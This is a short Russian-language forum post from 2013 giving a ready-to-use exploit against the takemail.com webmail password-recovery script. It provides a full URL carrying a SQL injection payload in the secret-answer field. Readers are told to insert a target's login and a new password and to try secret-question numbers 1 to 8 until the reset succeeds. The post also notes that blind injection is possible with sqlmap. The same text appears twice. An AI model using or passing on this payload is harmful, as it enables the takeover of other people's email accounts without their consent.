psihoz26
08.12.2013, 04:02
Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.
Code:
http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ]
Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса
Для этого меняем mail_secretquestion=* в ссылке
Всего их 8 (от 1 до 8)
Как многие поняли тут ещё sql иньекция.
Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\
Code:
http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ]
Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса
Для этого меняем mail_secretquestion=* в ссылке
Всего их 8 (от 1 до 8)
Как многие поняли тут ещё sql иньекция.
Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\